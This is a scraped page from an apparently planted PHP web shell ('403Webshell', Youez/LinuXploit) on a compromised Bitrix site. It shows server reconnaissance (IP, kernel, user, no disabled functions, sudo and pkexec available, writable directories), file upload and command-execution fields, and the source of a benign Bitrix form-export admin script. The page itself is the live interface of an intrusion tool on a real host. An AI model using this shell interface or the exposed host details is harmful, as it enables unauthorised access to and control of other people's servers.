403Webshell
Server IP : 80.87.202.40  /  Your IP : 216.73.216.169
Web Server : Apache
System : Linux rospirotorg.ru 5.14.0-539.el9.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Dec 5 22:26:13 UTC 2024 x86_64
User : bitrix ( 600)
PHP Version : 8.2.27
Disable Function : NONE
MySQL : OFF |  cURL : ON |  WGET : ON |  Perl : ON |  Python : OFF |  Sudo : ON |  Pkexec : ON
Directory :  /home/bitrix/ext_www/rospirotorg.ru/bitrix/modules/form/admin/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :


[ Back ]     

Current File : /home/bitrix/ext_www/rospirotorg.ru/bitrix/modules/form/admin/form_result_list_xls.php
<?
require_once($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/include/prolog_admin_before.php");
require_once($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/form/prolog.php");

CModule::IncludeModule("form");

ClearVars();

$FORM_RIGHT = $APPLICATION->GetGroupRight("form");
if($FORM_RIGHT<="D") $APPLICATION->AuthForm(GetMessage("ACCESS_DENIED"));

$WEB_FORM_ID = intval($WEB_FORM_ID);
$z = CForm::GetByID($WEB_FORM_ID);
if ($form=$z->Fetch())
{
	$SHOW_ADDITIONAL = "Y";
	$SHOW_ANSWER_VALUE = "Y";
	$SHOW_STATUS = "Y";
	$WEB_FORM_NAME = $form["SID"];
	IncludeModuleLangFile(__FILE__);
	$s = dirname($APPLICATION->GetCurPage())."/".basename($APPLICATION->GetCurPage(),"_xls.php").".php";
	InitSorting($s);
	require_once ($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/form/admin/body/form_result_list_handler.php");
	header("Content-Type: application/vnd.ms-excel");
	require_once ($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/include/prolog_excel_after.php");
	require_once ($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/form/admin/body/form_result_list_table_excel.php");
	require_once ($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/include/epilog_excel.php");
}

Youez - 2016 - github.com/yon3zu
LinuXploit